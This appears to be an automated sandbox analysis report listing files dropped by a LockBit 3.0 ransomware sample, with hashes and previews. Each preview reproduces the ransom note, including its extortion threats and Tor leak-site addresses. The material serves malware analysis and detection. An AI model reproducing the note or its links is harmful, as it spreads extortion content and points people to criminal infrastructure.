                C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.979819048055392
                Encrypted:false
                SSDEEP:192:t9QRqz/lGPBzjU0uGC3Y7wNSY8xdaE5//MZirPCWzmHxOlo:t9QQ0PxQpJ3kb3UE5sZWPHzqxt
                MD5:5BFE33D26B7A1F7E29D3A4E0B1A27A5A
                SHA1:8C87F34DB13C423AB4DD1FF5E94AE2C6572B29E1
                SHA-256:BD1B72AE4D790F59778A595BB927EF1B67679A79ADA21EC9ABC53F2701BEAD12
                SHA-512:85E709365A3E63FD5774B2242BCAE03D3C5550295EE82D6C4C4EE3F8DF5CEC51F52CE64476C3DBFAC076E635C1A4FBD798AF474A9FB7F8765D53C09CCF7B8C87
                Malicious:false
                Preview:.Nx<..x|....?4'......m...?.w.q......2IT...+c..up.6...o..G~,....r.(../....&..X....L.E../.A.z.8.[4.....k.L"8....~..$....n.'..-}yN...M-...2l.A.......c...#._...P9.S.1m....{.w......wJ{b.r......<..Kg..}$.....I!8R....4.`.G..9..}......-..-|.!1L<T.%........)0x..\2M....&E..x...M.f..tk...'%...R..RB.V..I..r.n..2..K.n`e...:.$....H..~...0j.R-bIJ@...b/.%.]'.n..|38.......=U....Fg0._.].G.HK.#.1.e..yd1.@|.4..Y!..3J...... ..c..1jt.>6.....s./,~@..f.....m"...<...&..;.U..|...}.g.'w(...\...D..j....Yy?...G.....;.G........k.?.3...n.D..V.q..f.HpI.Nn._.....i.~....W..>..I..r2........8.cw..9.{.n....a.........WF....m/U.4..aEq...*,=.Q .!wZX...../..$..R.....^.......X%QZ..{.o...i#..l..@>,...L...pL..H..\..B.EwsP..P.....g......{./..j..>aVae)J....@X.T..... ^.`&..2F.....+......9N..%.........g.GG..Z...L.'.?R0..OJU#..._h.r....|.}..aZ-EY..~..2o.^..{_[...VJ...*BY..O.j.,R.......h^..(...c..z.~.rb....d.4..k...:...&a...0./.}..AS..N.........?F.k*.u.].g.d.;D..v...#.LmE<...*..m.6......(

                C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
